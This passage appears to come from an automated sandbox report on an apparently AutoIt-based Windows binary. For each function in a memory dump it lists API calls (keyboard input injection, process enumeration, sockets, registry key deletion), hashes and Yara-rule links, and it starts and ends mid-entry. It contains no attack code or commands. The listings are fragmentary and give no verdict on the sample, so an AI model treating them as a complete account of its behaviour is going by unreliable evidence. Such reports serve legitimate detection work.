                                                      • Part of subcall function 0041A37C: AttachThreadInput.USER32(00000000,?,0041A554,?,00000001,0044F910,?,00000001), ref: 0041A3BA
                                                    • GetFocus.USER32(?,00000001,0044F910,?,00000001), ref: 0041A554
                                                      • Part of subcall function 0041A3C5: GetParent.USER32(?), ref: 0041A3D3
                                                    • GetClassNameW.USER32 ref: 0041A59D
                                                    • EnumChildWindows.USER32 ref: 0041A5C5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows
                                                    • String ID: %s%d
                                                    • API String ID: 2776554818-1110647743
                                                    • Opcode ID: 3037548b34176736f68bb970852b2978a76456e6dd11ea065ee4cfb503b827ab
                                                    • Instruction ID: a994fb5904acc18de9ce91c6bbc80047a69a58f74cb4f8545794af013614faba
                                                    • Opcode Fuzzy Hash: 3037548b34176736f68bb970852b2978a76456e6dd11ea065ee4cfb503b827ab
                                                    • Instruction Fuzzy Hash: F7216072101208BADB116BB1EC8AFFB376CEF45315F14407AF918AA092CA3959958B39
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042AEAB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0042AEBF
                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0042AF13
                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,0044F910), ref: 0042AF6A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: ErrorMode$InformationVolume
                                                    • String ID: %lu
                                                    • API String ID: 2507767853-685833217
                                                    • Opcode ID: 34dc7e1dfb1012275423fdf8504f2d01f85a20f25e9c76110d7e007666d6b4d7
                                                    • Instruction ID: 039331eed11949f1bc70e27bae1cc389e542e3b60105e877827ae8838b622f5a
                                                    • Opcode Fuzzy Hash: 34dc7e1dfb1012275423fdf8504f2d01f85a20f25e9c76110d7e007666d6b4d7
                                                    • Instruction Fuzzy Hash: A121B634A00108AFCB10DF55DD85EEE77B8EF89704B1140AAF909EB251DB35EE45CB21
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0044797D, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 004479E1
                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 004479F6
                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00447A03
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: msctls_trackbar32
                                                    • API String ID: 3850602802-1010561917
                                                    • Opcode ID: d8ce0129adf20d6ea32224458a48e65859c624e5bfed3b68a086e9a320245d2b
                                                    • Instruction ID: 3420294f707c5e05e9c3c0c817637d5dc45ffbd99d348530b0b06ae0f154dc95
                                                    • Opcode Fuzzy Hash: d8ce0129adf20d6ea32224458a48e65859c624e5bfed3b68a086e9a320245d2b
                                                    • Instruction Fuzzy Hash: C211C172244248BAFF149E74CC09FEB3B6DEF897A4F12461EF645A6090C7369812DB64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003E32AB, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,003E32EA,00000000,?,003E9EFE,000000FF,0000001E,0047BE28,00000008,003E9E62,00000000,?), ref: 003E32BA
                                                    • GetProcAddress.KERNEL32(?,CorExitProcess), ref: 003E32CC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: CorExitProcess$mscoree.dll
                                                    • API String ID: 1646373207-1276376045
                                                    • Opcode ID: e854db723a9a3b95db50a3d8a3fe5546e5f348b54895077d66ae4470ad766992
                                                    • Instruction ID: b16c2c1ba8fbb3cddf1c21eda81c385805d268b70ea72c7b1af731211b259a5e
                                                    • Opcode Fuzzy Hash: e854db723a9a3b95db50a3d8a3fe5546e5f348b54895077d66ae4470ad766992
                                                    • Instruction Fuzzy Hash: 86D01231340108FBEB014B91DD16FB93B6CFB42783B510562F904E0890C7639A089624
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C4D61, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,003C4D2E,?,003C4F4F,00000000,004862F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,00000000,00000001), ref: 003C4D6F
                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 003C4D81
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                    • API String ID: 2574300362-3689287502
                                                    • Opcode ID: 4e56a429d96fb2d005bea3fcd77e5b218999ae096d8d1ed43c6c8304a635ea20
                                                    • Instruction ID: 366625d22b2ac0f184809da4d8ce2709d0fbcc7f768d28fc81c1c41fd922cb77
                                                    • Opcode Fuzzy Hash: 4e56a429d96fb2d005bea3fcd77e5b218999ae096d8d1ed43c6c8304a635ea20
                                                    • Instruction Fuzzy Hash: 63E0C270500342DED7202F30DC0CB827AD4FF02392B20893EE487C0560D2349880CB64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C4D94, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,003C4CE1,?,003FDD1E,00000000,004862F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,00000000,00000001), ref: 003C4DA2
                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 003C4DB4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                    • API String ID: 2574300362-1355242751
                                                    • Opcode ID: 422c465edaa3e6a5d18bb194b1279fb7688e726f9bfe7e647cbac206b981a922
                                                    • Instruction ID: 5869546c17d6b7778d8666c5d500fa417cc34cc5f5ae0b70e64f79040a53c5ec
                                                    • Opcode Fuzzy Hash: 422c465edaa3e6a5d18bb194b1279fb7688e726f9bfe7e647cbac206b981a922
                                                    • Instruction Fuzzy Hash: B8E0C270500703CED7202F31D90CF867AD4EF06395B10883EE4C6C0450D734D880C714
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00441072, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,004412C1), ref: 00441080
                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00441092
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                    • API String ID: 2574300362-4033151799
                                                    • Opcode ID: f4ba7035be9ae6ac15270cff1a3d58b3795198c1c4ffa192c5510664c06e2db8
                                                    • Instruction ID: ed60331976c6fc02a9cff71c158f5513a0be87b5c88f1e271bb4c89982deecd9
                                                    • Opcode Fuzzy Hash: f4ba7035be9ae6ac15270cff1a3d58b3795198c1c4ffa192c5510664c06e2db8
                                                    • Instruction Fuzzy Hash: A7E0EC74510712DEE7205B35D81DA9776E4EF05361B11CD3AA489C5960D738D4C0C658
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004393F5, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00439009,?,0044F910), ref: 00439403
                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00439415
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                    • API String ID: 2574300362-199464113
                                                    • Opcode ID: 92312ca8346b868430cd36b580f449afe62dceb458b1e4a39be36946c001b6b4
                                                    • Instruction ID: d4bfad593574a15c6661aac73b5f788981490f1011ec471fcd1779854b10bc74
                                                    • Opcode Fuzzy Hash: 92312ca8346b868430cd36b580f449afe62dceb458b1e4a39be36946c001b6b4
                                                    • Instruction Fuzzy Hash: C0E01274508713DFD7205F31DA0964776D5EF16392F20C83AE495D5950D678D884C658
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C4C95, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000000,003C4C2E,?,00000000), ref: 003C4CA3
                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 003C4CB5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                    • API String ID: 2574300362-192647395
                                                    • Opcode ID: 771c8b4ca545a8ce287d9095478b9778ddce227fd06b2dfa291a9a36e2b816da
                                                    • Instruction ID: df9db66906d299aae78a596bf36abf4cfb0d52405850fddd3e43199ea9a4ea89
                                                    • Opcode Fuzzy Hash: 771c8b4ca545a8ce287d9095478b9778ddce227fd06b2dfa291a9a36e2b816da
                                                    • Instruction Fuzzy Hash: A2D01774950723DFE7209F31DA28B0676E5AF06791B22C83E9886D6560EA74EC84CB54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004176C5, Relevance: 6.3, APIs: 4, Instructions: 345COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5c02e7ff7869fa0eec86cce8a3c50c63891b1592df2c956a61f166b03c4e36d5
                                                    • Instruction ID: dbb605fe0d024a2cd4939ac973002a04d890664dbb81615384b47257665e8336
                                                    • Opcode Fuzzy Hash: 5c02e7ff7869fa0eec86cce8a3c50c63891b1592df2c956a61f166b03c4e36d5
                                                    • Instruction Fuzzy Hash: AAC190B5A14216EFDB14DF94C888DEEBBB5FF48314B10859AE405EB250D734EE81CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004383A8, Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CoInitialize.OLE32(00000000), ref: 004383D8
                                                    • CoUninitialize.OLE32 ref: 004383E3
                                                      • Part of subcall function 0041DA5D: CoCreateInstance.OLE32(00000018,00452C2C,00000005,00000028,?,?,00000001,?,?,00000000,00000000,00000000,?,00438639,?,00000000), ref: 0041DAC5
                                                    • VariantInit.OLEAUT32(?), ref: 004383EE
                                                    • VariantClear.OLEAUT32(?), ref: 004386BF
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                    • String ID:
                                                    • API String ID: 780911581-0
                                                    • Opcode ID: 5e1e852176aa5069115d4d243c8a43b274f66b94f509429e8dd080a7af710ec8
                                                    • Instruction ID: 44de61e7b6f577275991d94fb9156220cd2f37c22ee69ba04cbebd2e50f5e652
                                                    • Opcode Fuzzy Hash: 5e1e852176aa5069115d4d243c8a43b274f66b94f509429e8dd080a7af710ec8
                                                    • Instruction Fuzzy Hash: D6A136752047019FCB11DF15C885B1AB7E4BF88714F15944EF99A9B3A1CB34ED05CB4A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00416DF3, Relevance: 6.2, APIs: 4, Instructions: 220memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Variant$AllocClearCopyInitString
                                                    • String ID:
                                                    • API String ID: 2808897238-0
                                                    • Opcode ID: 339f8293f92261e4670814d592732add1e174bb0552eec827ef8354cb24d82fa
                                                    • Instruction ID: 842444cae88d5ffde7028ba60924d8a8a18abf094351b300a12137e4c5f106ca
                                                    • Opcode Fuzzy Hash: 339f8293f92261e4670814d592732add1e174bb0552eec827ef8354cb24d82fa
                                                    • Instruction Fuzzy Hash: 2951E835208301ADD730AF65E885EABB7B8DF09360F20881FF555DA191DB38D8C5DB29
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043F121, Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 0043F151
                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0043F15F
                                                    • Process32NextW.KERNEL32(00000000,?), ref: 0043F21F
                                                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0043F22E
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                    • String ID:
                                                    • API String ID: 420147892-0
                                                    • Opcode ID: 847cfad2fee4e34be3744290f2d7bf0dddb68cce016f8ebc0bc180fe017db7c3
                                                    • Instruction ID: 13b41c40d3e2acb8804a2ec3a3bd00e8635428025b05e966ca430454f2082f26
                                                    • Opcode Fuzzy Hash: 847cfad2fee4e34be3744290f2d7bf0dddb68cce016f8ebc0bc180fe017db7c3
                                                    • Instruction Fuzzy Hash: 9B515B715047019FD311EF20DC85F6BBBE8AF98710F10482EF995DA251EB70AD08CB96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00449A63, Relevance: 6.1, APIs: 4, Instructions: 142COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetWindowRect.USER32 ref: 00449AD2
                                                    • ScreenToClient.USER32 ref: 00449B05
                                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00449B72
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Window$ClientMoveRectScreen
                                                    • String ID:
                                                    • API String ID: 3880355969-0
                                                    • Opcode ID: 24d397232f13e076dce1bc171240c1dffcdddbd309444109e310bdb5bad926b8
                                                    • Instruction ID: b520e46fdfafcb421ec628f962b5ac8040538e9eaf8248564d88df7b18bac6dc
                                                    • Opcode Fuzzy Hash: 24d397232f13e076dce1bc171240c1dffcdddbd309444109e310bdb5bad926b8
                                                    • Instruction Fuzzy Hash: 7A513B34A00249AFEF10DF68E880AAF7BB5FB45360F14866AF8159B390D734AD41DB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00436CBD, Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00436CE4
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00436CF4
                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00436D58
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00436D64
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: ErrorLast$socket
                                                    • String ID:
                                                    • API String ID: 1881357543-0
                                                    • Opcode ID: c98612b1d4e1d816b4a562cc969272d8f6a9011903cdfe51ee3b1ef203986b5d
                                                    • Instruction ID: 34346b6915a03fef01a04f4003d463f8859342d0314d9b21bf965db55208f5bf
                                                    • Opcode Fuzzy Hash: c98612b1d4e1d816b4a562cc969272d8f6a9011903cdfe51ee3b1ef203986b5d
                                                    • Instruction Fuzzy Hash: 4141A074740200AFEB21AF24DC8AF7A77A99B08B10F45801EFA59DF2D2DB749D008B95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00448AC0, Relevance: 6.1, APIs: 4, Instructions: 111COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00448B4D
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: InvalidateRect
                                                    • String ID:
                                                    • API String ID: 634782764-0
                                                    • Opcode ID: c525c0c2150ac1a2d4f6a179cf9c31bbd4dee38e91e6cfe4a2dbf6aeae760ad6
                                                    • Instruction ID: 90ef501b6af2e95a282f57efee7b8fc9102bd6d9bc972ddb382a45249585bded
                                                    • Opcode Fuzzy Hash: c525c0c2150ac1a2d4f6a179cf9c31bbd4dee38e91e6cfe4a2dbf6aeae760ad6
                                                    • Instruction Fuzzy Hash: AE31D474640248BEFF219B18CC45FAE37A4EB06364F24491FF651E63A1CE39B9408B59
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00420FE6, Relevance: 6.1, APIs: 4, Instructions: 111keyboardwindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00421037
                                                    • SetKeyboardState.USER32(00000080), ref: 00421053
                                                    • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 004210B9
                                                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 0042110B
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: KeyboardState$InputMessagePostSend
                                                    • String ID:
                                                    • API String ID: 432972143-0
                                                    • Opcode ID: cbf8b62a7deb611ac55512567d52843e70c3204511e1dc4c3e319cd9b5d8e2f3
                                                    • Instruction ID: 660dc704686c7786fa320c38a88f1207491eb2d1deb6ddc2bebc29e586fea62f
                                                    • Opcode Fuzzy Hash: cbf8b62a7deb611ac55512567d52843e70c3204511e1dc4c3e319cd9b5d8e2f3
                                                    • Instruction Fuzzy Hash: 7D312C30B406A8ADFB308B66AC05BFB7BA9EB65311F94422BF180519F1C37D49C58769
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042BA5F, Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0042BB09
                                                    • GetLastError.KERNEL32(?,00000000), ref: 0042BB2F
                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0042BB54
                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0042BB80
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                    • String ID:
                                                    • API String ID: 3321077145-0
                                                    • Opcode ID: 92a3130f401b4a43584a7cbdd31fc64663fec1f4b9a254400739c410eda101b1
                                                    • Instruction ID: 6c2f9b2ec637674275be6eab52fb40e958de14d1e50a36e06ec3ff3edee3a852
                                                    • Opcode Fuzzy Hash: 92a3130f401b4a43584a7cbdd31fc64663fec1f4b9a254400739c410eda101b1
                                                    • Instruction Fuzzy Hash: B1411839200A10DFCB11EF15D589A59BBE5EF49710B0A849AE84A9F762CB34FD01CB95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0044ADF1, Relevance: 6.1, APIs: 4, Instructions: 110windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
